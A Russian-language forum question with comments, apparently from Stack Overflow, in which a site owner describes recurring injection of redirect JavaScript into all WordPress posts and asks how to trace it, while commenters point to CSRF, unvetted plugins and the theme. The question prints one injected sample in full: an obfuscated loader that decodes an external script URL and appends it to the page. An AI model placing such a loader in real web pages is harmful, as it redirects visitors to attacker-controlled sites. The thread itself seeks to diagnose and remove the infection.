# Регулярные заражения WordPress-сайта javacript-переадресациями

Tags: wordpress, malware

Имеется сайт, с последними обновлениями: самого WordPress и плагинов.
Тема самописная - никаких уязвимостей не содержит - в ней вообще ничего лишнего нет. 
Установлен и хорошенько настроен плагин безопасности iThemes security.

Практически 1 раз в 7-10 дней происходит регулярное заражение всех записей (таблица posts) - по сути в конец каждой записи добавляется строчки подключения javascript'а - переадресующего на сайте посетителя на другие сайты или просто такие вот конструкции:

```
<script type=text/javascript>Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,56);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
```

вирусный javascript каждый раз видоизменяется, иногда просто подключается внешний файл, а иногда такая вот шифровка как выше...

Все файлы сайта, плагинов, ядра WordPress без изменений - проверял и сравнивал с дозараженными копиями сайта. Обновлял всё и вся как только можно и нельзя. В базе никаких особых признаков нет. WP_CRON переключил на серверный.

Что делать? Как определить заразу?
Копаться в логах SQL и GET запросов?

p.s.: а ха да все доступы менял по кругу несколько раз: администратора WP, FTP, MySQL, компьютер с которого осуществляет доступ в админку один - проверялся двумя антивирусниками, браузер переустанавливался.

Comment: "Тема самописная - никаких уязвимостей не содержит - в ней вообще ничего лишнего нет." - оочень сильное утверждение ))

Comment: Типичный CSRF. Где-то работа с формами без nonce и без проверок на current_user_can()

Comment: Ок, в общем нужно пройтись по всем формам на предмет отсутствия использования wp_nonce_field() - и там где его нет реализовать. Спасибо посмотрю! Но почему-то уверен что такого в нашей теме нет от слова совсем )

Comment: Стандартная форма поиска без nonce, есть еще форма заказа обратного звонка через Contact Form 7 - на этом всё, больше форм на сайте нет

Comment: А в плагинах? Вопрос комплексный, здесь его не решить.

Comment: А что в плагинах? Они ничего на сайте не выводят больше - никаких форм и нигде. Или вы про Contact Form 7?

Comment: CF7 не содержит известных уязвимостей. а что у вас там ещё за плагины - никому неизвестно. Вам надо нанять специалиста.

Comment: да ну прекратите издеваться, ничего приметного: ACF, Autoptimize, Classic Editor, Contact Form 7, Custom Post Type UI, Logo Slider and Showcase, Responsive Lightbox & Gallery, TinyMCE Advanced, WP Responsive Table, Yoast SEO, Webcraftic Clearfy - всё...

Comment: Я не издеваюсь. Половину плагинов я знаю и им можно доверять, остальные - нет. В них могут быть любые уязвимости. Как и в вашей теме, её код надо смотреть.

Comment: Ну я же вам написал Выше что просмотрел весь код нашей темы, ничего особенного в нём нет - уязвимостей явных мы не наблюдаем. Не вчера с WordPress работаем, поди уже 11ый год пошёл, не студенты...
Просто раньше таких случаев регулярного заражения не наблюдали, я понимаю что возможно где-то потенциальная уязвимость в коде темы или плагинов

Comment: То, что вы не наблюдаете никак не говорит что "не содержит".  А последний плаг - просто маркер "специалистов".. :) См https://ru.stackoverflow.com/questions/777029/%D0%92%D0%B8%D1%80%D1%83%D1%81%D1%8B-%D0%B2-wordpress/777040#777040 и https://xakep.ru/2020/06/04/wordpress-campaign-2/ И да, вопрос не по теме SO

Comment: Webcraftic Clearfy - это маркер для специалистов? А что с ним не так? Из двух ссылок ничего нового для себя не узнал, статья из хакера - забавная хрень от разработчиков Wordfence - который нифига не находит в базе данных простые вкрапления javascript'ов - я им в суппорт уже 3-4 сигнатуры отправил - говорят: "добавим в базу", ага, полгода прошло - эффекта ноль! нашли кому верить )

Comment: Не маркер ДЛЯ специалистов, а маркер "специалистов". Т.е. сразу видно что ламеры, не понимающие даже что и зачем это гуано делает За личность и деятельность "автора"-вора - вообще отдельный разговор. https://ru.wordpress.org/support/topic/%d0%bf%d0%bb%d0%b0%d0%b3%d0%b8%d0%bd-clearfy-2/ и много чего ещё если станет интересно интересно: https://ru.wordpress.org/support/search/Clearfy/ Хотя  "забавная хрень от разработчиков Wordfence" мне подсказывает что это всё бимер. Удачи.

Comment: бр... ))) ничего не понял ) что такое "бимер"? Личность и деятельность автора плагина Clearfy меня не интересует, вопрос в том, что не так с этим плагином? у него много выявленных уязвимостей и проблем в плане безопасности? есть пруфы?